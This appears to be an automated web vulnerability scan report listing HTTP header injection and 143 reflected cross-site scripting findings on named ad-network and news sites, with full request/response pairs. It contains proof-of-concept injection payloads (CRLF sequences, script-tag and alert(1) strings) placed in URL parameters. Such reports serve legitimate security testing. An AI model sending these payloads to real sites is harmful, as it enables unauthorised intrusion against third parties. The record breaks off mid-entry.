P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 16:34:32 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 16:19:32 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305561775|60130^1^1305560226|50220^1^1304989381|53615^1^1305562772|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562772|52766^1^1305562772; path=/; expires=Mon, 16-May-11 16:19:32 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955421^1304959772|13015^1304956956^1304958756|12174^1304956975^1304958775|18139^1304957972^1304959772; path=/; expires=Mon, 09-May-11 16:49:32 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|60740|57130|53380|60490|60512|60489|57149|60515|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|60146|52576|56969|56835|56780|57372|56761; expires=Thu, 03-May-12 16:19:32 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:a847d6095e047baa644f1ef7d852edf7bc012
927f6eda590,aff3a0d34f874c485c6aff040641c190; expires=Thu, 03-May-12 16:19:32 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NjA3NDA6NTcxMzA6NTMzODA6NjA0OTA6NjA1MTI6NjA0ODk6NTcxNDk6NjA1MTU6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NjAxNDY6NTI1NzY=; expires=Thu, 03-May-12 16:19:32 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|60740|57130|53380|60490|60512|60489|57149|60515|50963|52615|60491|50507|53656|55401|60509|
...[SNIP]...

1.25. http://tacoda.at.atwola.com/rtx/r.js [si parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload d925c%0d%0a65954618359 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=DTX:DWT:DUY&si=d925c%0d%0a65954618359&pi=L&xs=3&pu=http%253A//an.tacoda.net/an/18139/bizo_multi.htm%253Fpid%253D224%2526u%253Dfa%253Afa_it%252Csen%253Asen_exec%252Cind%253Aind_bizser%2526ifu%253Dhttp%25253A//js.bizographics.com/support/partner.html%25253Fpid%25253D224%252526u%25253Dfa%25253Afa_it%25252Csen%25253Asen_exec%25252Cind%25253Aind_bizser&df=1&v=5.5&cb=61142 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://an.tacoda.net/an/18139/bizo_multi.htm?pid=224&u=fa:fa_it,sen:sen_exec,ind:ind_bizser
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; eadx=x; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305561775|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756; Tsid=0^1304955421^1304958775|18181^1304955421^1304957226|13015^1304956956^1304958756|12174^1304956975^1304958775; TData=99999|^|51134|56281|50086|50085|53380|60490|60512|57149|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56673|60146|56780|56969|56835|56232|56761|56768|56681|54057|56148; N=2:cce56ea51bb938bc8d726cc79d6aee7f,a847d6095e047baa644f1ef7d852edf7; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTcxNDk6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY2NzM6NjAxNDY6NTY3ODA6NTY5Njk6NTY4MzU6NTYyMzI=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:19:31 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 16:34:31 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 16:19:31 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305561775|60130^1^1305560226|50220^1^1304989381|53615^1^1305562771|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562771|52766^1^1305562771; path=/; expires=Mon, 16-May-11 16:19:31 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955421^1304959771|13015^1304956956^1304958756|12174^1304956975^1304958775|d925c
65954618359^1304957971^1304959771; path=/; expires=Mon, 09-May-11 16:49:31 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|60740|57130|53380|60490|60512|60489|57149|60515|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|60146|52576|56969|56835|56780|57372|56761; expires=Thu, 03-May-12 16:19:31 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:a847d6095e047baa644f1ef7d852edf7,aff3a0d34f874c485c6aff040641c190; expires=Thu, 03-May-12 16:19:31 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NjA3NDA6NTcxMzA6NTMzODA6NjA0OTA6NjA1MTI6NjA0ODk6NTcxNDk6NjA1MTU6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NjAxNDY6NTI1NzY=; expires=Thu, 03-May-12 16:19:31 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|60740|57130|53380|60490|60512|60489|57149|60515|50963|52615|60491|50507|53656|55401|60509|
...[SNIP]...

2. Cross-site scripting (reflected) previous
There are 143 instances of this issue:

http://247wallstreet.us.intellitxt.com/al.asp [jscallback parameter]
http://247wallstreet.us.intellitxt.com/iframescript.jsp [src parameter]
http://247wallstreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
http://247wallstreet.us.intellitxt.com/v4/init [jscallback parameter]
http://247wallstreet.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/cm.quadhearst/ [REST URL parameter 2]
http://a.collective-media.net/adj/cm.quadhearst/ [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/cm.quadhearst/ [sz parameter]
http://a.collective-media.net/adj/q1.q.sanfrancisco/be_bus [REST URL parameter 2]
http://a.collective-media.net/adj/q1.q.sanfrancisco/be_bus [REST URL parameter 3]
http://a.collective-media.net/adj/q1.q.sanfrancisco/be_bus [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.q.sanfrancisco/be_bus [sz parameter]
http://a.collective-media.net/adj/q1.sanfrancisco/bus [REST URL parameter 2]
http://a.collective-media.net/adj/q1.sanfrancisco/bus [REST URL parameter 3]
http://a.collective-media.net/adj/q1.sanfrancisco/bus [name of an arbitrarily supplied request parameter]
http://a.collective-media.net/adj/q1.sanfrancisco/bus [sz parameter]
http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus [REST URL parameter 1]
http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus [REST URL parameter 2]
http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus [REST URL parameter 3]
http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus [sz parameter]
http://a.collective-media.net/cmadj/q1.sanfrancisco/bus [REST URL parameter 1]
http://a.collective-media.net/cmadj/q1.sanfrancisco/bus [REST URL parameter 2]
http://a.collective-media.net/cmadj/q1.sanfrancisco/bus [REST URL parameter 3]
http://a.collective-media.net/cmadj/q1.sanfrancisco/bus [sz parameter]
http://ad.doubleclick.net/adj/marketwatch.com/brokerdock [sym parameter]
http://ad.doubleclick.net/adj/marketwatch.com/investing_stocks_quotesoverview [sym parameter]
http://ad.doubleclick.net/adj/tsc-headlines-and-perspectives/financial-services [storyid parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/20110509161935 [click parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/20110509161935 [keywords parameter]
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1331.0.iframe.300x250/20110509161935 [name of an arbitrarily supplied request parameter]
http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]
http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]
http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]
http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]
http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]
http://adsfac.eu/ag.asp [cc parameter]
http://altfarm.mediaplex.com/ad/js/16186-115667-1844-30 [mpt parameter]
http://altfarm.mediaplex.com/ad/js/16186-115667-1844-30 [mpvc parameter]
http://altfarm.mediaplex.com/ad/js/16186-115667-1844-30 [name of an arbitrarily supplied request parameter]
http://altfarm.mediaplex.com/ad/js/16186-115667-22724-5 [mpt parameter]
http://altfarm.mediaplex.com/ad/js/16186-115667-22724-5 [mpvc parameter]
http://altfarm.mediaplex.com/ad/js/16186-115667-22724-5 [name of an arbitrarily supplied request parameter]
http://altfarm.mediaplex.com/ad/js/17113-117439-25710-4 [mpt parameter]
http://altfarm.mediaplex.com/ad/js/17113-117439-25710-4 [mpvc parameter]
http://altfarm.mediaplex.com/ad/js/17113-117439-25710-4 [name of an arbitrarily supplied request parameter]
http://altfarm.mediaplex.com/ad/js/17113-117439-25710-5 [mpt parameter]
http://altfarm.mediaplex.com/ad/js/17113-117439-25710-5 [mpvc parameter]
http://altfarm.mediaplex.com/ad/js/17113-117439-25710-5 [name of an arbitrarily supplied request parameter]
http://altfarm.mediaplex.com/ad/js/17263-119359-25710-2 [mpt parameter]
http://altfarm.mediaplex.com/ad/js/17263-119359-25710-2 [mpvc parameter]
http://altfarm.mediaplex.com/ad/js/17263-119359-25710-2 [name of an arbitrarily supplied request parameter]
http://altfarm.mediaplex.com/ad/js/17263-119359-25710-3 [mpt parameter]
http://altfarm.mediaplex.com/ad/js/17263-119359-25710-3 [mpvc parameter]
http://altfarm.mediaplex.com/ad/js/17263-119359-25710-3 [name of an arbitrarily supplied request parameter]
http://altfarm.mediaplex.com/ad/js/17263-119359-25710-4 [mpt parameter]
http://altfarm.mediaplex.com/ad/js/17263-119359-25710-4 [mpvc parameter]
http://altfarm.mediaplex.com/ad/js/17263-119359-25710-4 [name of an arbitrarily supplied request parameter]
http://americanbankingnews.us.intellitxt.com/al.asp [jscallback parameter]
http://americanbankingnews.us.intellitxt.com/iframescript.jsp [src parameter]
http://americanbankingnews.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
http://americanbankingnews.us.intellitxt.com/v4/init [jscallback parameter]
http://americanbankingnews.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]
http://api.bizographics.com/v1/profile.json [&callback parameter]
http://api.bizographics.com/v1/profile.json [api_key parameter]
http://api.bizographics.com/v1/profile.redirect [api_key parameter]
http://api.bizographics.com/v1/profile.redirect [callback_url parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]
http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]
http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [q parameter]
http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [q parameter]
http://choices.truste.com/ca [c parameter]
http://choices.truste.com/ca [h parameter]
http://choices.truste.com/ca [iplc parameter]
http://choices.truste.com/ca [ox parameter]
http://choices.truste.com/ca [plc parameter]
http://choices.truste.com/ca [w parameter]
http://choices.truste.com/ca [zi parameter]
http://citi.bridgetrack.com/a/s/ [BT_PID parameter]
http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]
http://contribute.sfgate.com/ver1.0/Direct/Jsonp [cb parameter]
http://contribute.sfgate.com/ver1.0/sys/jsonp.app [cb parameter]
http://contribute.sfgate.com/ver1.0/sys/jsonp.app [hdnpluck_imageserver parameter]
http://contribute.sfgate.com/ver1.0/sys/jsonp.app [hdnpluck_refreshbaseurl parameter]
http://contribute.sfgate.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]
http://contribute.sfgate.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]
http://contribute.sfgate.com/ver1.0/sys/jsonp.app [plckitemsperpage parameter]
http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 1]
http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 2]
http://digg.com/img/badges/16x16-digg-guy.gif [REST URL parameter 3]
http://ib.adnxs.com/ptj [redir parameter]
http://img.mediaplex.com/content/0/17113/tilt_640x480_equity.html [mpck parameter]
http://img.mediaplex.com/content/0/17113/tilt_640x480_equity.html [mpck parameter]
http://img.mediaplex.com/content/0/17113/tilt_640x480_equity.html [mpvc parameter]
http://img.mediaplex.com/content/0/17113/tilt_640x480_equity.html [mpvc parameter]
http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]
http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
http://investingchannel.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://k.collective-media.net/cmadj/cm.quadhearst/ [REST URL parameter 2]
http://onespot.sfgate.com/ism/business_4/index.js [_ parameter]
http://onespot.sfgate.com/ism/business_4/index.js [callback parameter]
http://pglb.buzzfed.com/43442/a07b648008ec0cba5cc00e2ff0712c14 [callback parameter]
http://ping.crowdscience.com/ping.js [m parameter]
http:/redacted [size parameter]
http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]
http://thestreet.onespot.com/ism/bottom/index.js [_ parameter]
http://thestreet.onespot.com/ism/bottom/index.js [callback parameter]
http://thestreet.onespot.com/ism/top/index.js [_ parameter]
http://thestreet.onespot.com/ism/top/index.js [callback parameter]
http://www.linkedin.com/cws/share-count [url parameter]
http://www.marketwatch.com/bg/api/Connect.ashx [REST URL parameter 1]
http://www.marketwatch.com/bg/api/Connect.ashx [REST URL parameter 2]
http://www.marketwatch.com/bg/api/Pickup.ashx [REST URL parameter 1]
http://www.marketwatch.com/bg/api/Pickup.ashx [REST URL parameter 2]
http://www.marketwatch.com/investing/future/clm11 [REST URL parameter 2]
http://www.marketwatch.com/investing/future/clm11 [REST URL parameter 3]
http://www.marketwatch.com/investing/future/clm11 [REST URL parameter 3]
http://www.marketwatch.com/investing/stock/clm11 [REST URL parameter 2]
http://www.marketwatch.com/investing/stock/clm11 [REST URL parameter 3]
http://www.marketwatch.com/investing/stock/clm11 [REST URL parameter 3]
http://www.thestreet.com/sponsor/financial-services/ad.ajaxaction [callbackfunction parameter]
http://api.bizographics.com/v1/profile.json [Referer HTTP header]
http://search.keywordblocks.com/cmdynet [Referer HTTP header]
http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus [cli cookie]
http://a.collective-media.net/cmadj/q1.sanfrancisco/bus [cli cookie]
http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [ZEDOIDA cookie]
http://k.collective-media.net/cmadj/cm.quadhearst/ [cli cookie]
http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_1064833_61548615 [meld_sess cookie]
http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_657020_29767596 [meld_sess cookie]
http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_657020_29767596 [meld_sess cookie]
http://www.marketwatch.com/investing/future/clm11 [rsi_csl cookie]
http://www.marketwatch.com/investing/future/clm11 [rsi_csl cookie]
http://www.marketwatch.com/investing/stock/clm11 [rsi_csl cookie]
http://www.marketwatch.com/investing/stock/clm11 [rsi_csl cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://247wallstreet.us.intellitxt.com/al.asp [jscallback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://247wallstreet.us.intellitxt.com
Path:	/al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dae82%3balert(1)//7f4e875225b was submitted in the jscallback parameter. This input was echoed as dae82;alert(1)//7f4e875225b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /al.asp?ts=20110509161827&adid=0%2C46353%2C0%2C46353%2C4513%2C0&cc=us&di=29178665%2C28583000%2C29178465%2C28583972%2C32656869%2C29178453&hk=1&ipid=8372&mh=8bccb8904d8af05accfc58ac1e54f475&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=6a335cb0a5888b3c4ea48f2bd7e64765&pvu=74F297101ABE4C7383C6596C51E4FE66&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C2%2C0%2C2%2C0%2C0&ur=0%2C32768%2C0%2C32768%2C0%2C0&kp=597%2C648%3B509%2C732%3B467%2C1005%3B618%2C1215%3B315%2C1320%3B215%2C1530%3B&prf=ll%3A236%7Cintl%3A3038%7Cpreprochrome%3A7%7Cgetconchrome%3A69%7Cadvint%3A3116%7Cadvl%3A3116%7Ctl%3A3421&jscallback=$iTXT.js.callback1dae82%3balert(1)//7f4e875225b HTTP/1.1
Host: 247wallstreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://247wallst.com/2011/05/06/anticipating-the-citigroup-reverse-stock-split-trading-implications-are-major-and-many-c-aig-nyx-bac-wfc-jpm-rf-key-bpop-ire-aib-nbg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwYAAAEv1Y1e4AA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwYAAAEv1Y1e4AA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:20:42 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Mon, 09 May 2011 16:20:42 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1dae82;alert(1)//7f4e875225b();}catch(e){}

2.2. http://247wallstreet.us.intellitxt.com/iframescript.jsp [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://247wallstreet.us.intellitxt.com
Path:	/iframescript.jsp

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d12be"><script>alert(1)</script>cd618efd86d was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2639%26type%3Dscript%26ipid%3D8372%26sfid%3D0d12be"><script>alert(1)</script>cd618efd86d HTTP/1.1
Host: 247wallstreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://247wallst.com/2011/05/06/anticipating-the-citigroup-reverse-stock-split-trading-implications-are-major-and-many-c-aig-nyx-bac-wfc-jpm-rf-key-bpop-ire-aib-nbg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwYAAAEv1Y1e4AA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/html
Content-Length: 189
Date: Mon, 09 May 2011 16:19:50 GMT
Age: 0
Connection: keep-alive

<html><body><script src="http://pixel.intellitxt.com/pixel.jsp?id=2639&type=script&ipid=8372&sfid=0d12be"><script>alert(1)</script>cd618efd86d" language="javascript"></script></body></html>

2.3. http://247wallstreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://247wallstreet.us.intellitxt.com
Path:	/intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3f16'-alert(1)-'1193a87c0e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /intellitxt/front.asp?ipid=8372&f3f16'-alert(1)-'1193a87c0e4=1 HTTP/1.1
Host: 247wallstreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://247wallst.com/2011/05/06/anticipating-the-citigroup-reverse-stock-split-trading-implications-are-major-and-many-c-aig-nyx-bac-wfc-jpm-rf-key-bpop-ire-aib-nbg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwUAAAEv1Y0E5wA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwYAAAEv1Y6a9wA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:19:43 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwYAAAEv1Y6a9wA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 16:19:43 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:19:43 GMT
Age: 0
Connection: keep-alive
Content-Length: 11737

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
,aol,ask,live,bing",
'ids.aol':"10",
'fields.aol':"query,as_q,q",
'fields.ask':"q",
'fields.google':"q,as_q"};
$iTXT.js.serverUrl='http://247wallstreet.us.intellitxt.com';$iTXT.js.pageQuery='ipid=8372&f3f16'-alert(1)-'1193a87c0e4=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

2.4. http://247wallstreet.us.intellitxt.com/v4/init [jscallback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://247wallstreet.us.intellitxt.com
Path:	/v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 44f03%3balert(1)//58d44a91433 was submitted in the jscallback parameter. This input was echoed as 44f03;alert(1)//58d44a91433 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

